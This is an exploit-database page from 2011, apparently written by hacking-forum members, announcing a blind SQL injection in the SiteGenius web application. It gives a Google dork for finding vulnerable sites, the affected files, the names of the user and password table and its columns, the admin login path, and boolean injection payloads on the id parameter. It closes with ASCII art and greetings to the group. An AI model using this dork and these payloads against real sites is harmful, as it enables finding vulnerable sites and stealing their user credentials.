SiteGenius Blind SQL injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SiteGenius Blind SQL injection Vulnerability
# Published : 2011-08-02
# Author :
# Previous Title : phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability
# Next Title : WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability

=====================================================
SiteGenius  Blind SQL injection vulnerability
=====================================================


# Exploit title : SiteGenius Blind SQL injection vulnerability
# Date : 02  08  2011
# Author : AutoRUN  & dR.sqL
# Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net,  HackingWith.US , 
# Software Link : http://www.sitegenius.com
# Tested on : Windows XP & Linux
# Category : web apps
# Google Dork : inurl:"sitegenius/topic.php?id="
# Versions affected : All

----------------------------------
#      ~  ExpL0!taTi0N ~       #
----------------------------------

Affected files : topic.php & article.php

SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php


Exploit : http://localhost/sitegenius/topic.php?id=1 and 1=1  --> TRUE
             http://localhost/sitegenius/topic.php?id=1 and 1=2  --> FALSE

w00t!! Blind SQL injection !


     _         _        ____  _   _ _   _    ___         _ ____              _     
    /   _   _| |_ ___ |  _ | | | |  | |  ( _ )     __| |  _    ___  __ _| |    
   / _ | | | | __/ _ | |_) | | | |  | |  / _ /  / _` | |_) | / __|/ _` | |    
  / ___  |_| | |_ (_) |  _ <| |_| | |  | | (_>  < | (_| |  _ < ___  (_| | |___ 
 /_/   ___,_|_____/|_| _\___/|_| _|  ___//  __,_|_| _(_)___/__, |_____|
                                                                          |_|      




# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , 
                R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends.

  ____                      _   ____  ____       _    _ _                 _               _
 |  _  _ __ ___  _   _  __| | |___ | __ )     /   | | |__   __ _ _ __ (_) __ _ _ __   | |
 | |_) | '__/ _ | | | |/ _` |   __) |  _     / _  | | '_  / _` | '_ | |/ _` | '_   | |
 |  __/| | | (_) | |_| | (_| |  / __/| |_) |  / ___ | | |_) | (_| | | | | | (_| | | | | |_|
 |_|   |_|  ___/ __,_|__,_| |_____|____/  /_/   __|_.__/ __,_|_| |_|_|__,_|_| |_| (_)
                                                                                             
 
# 2011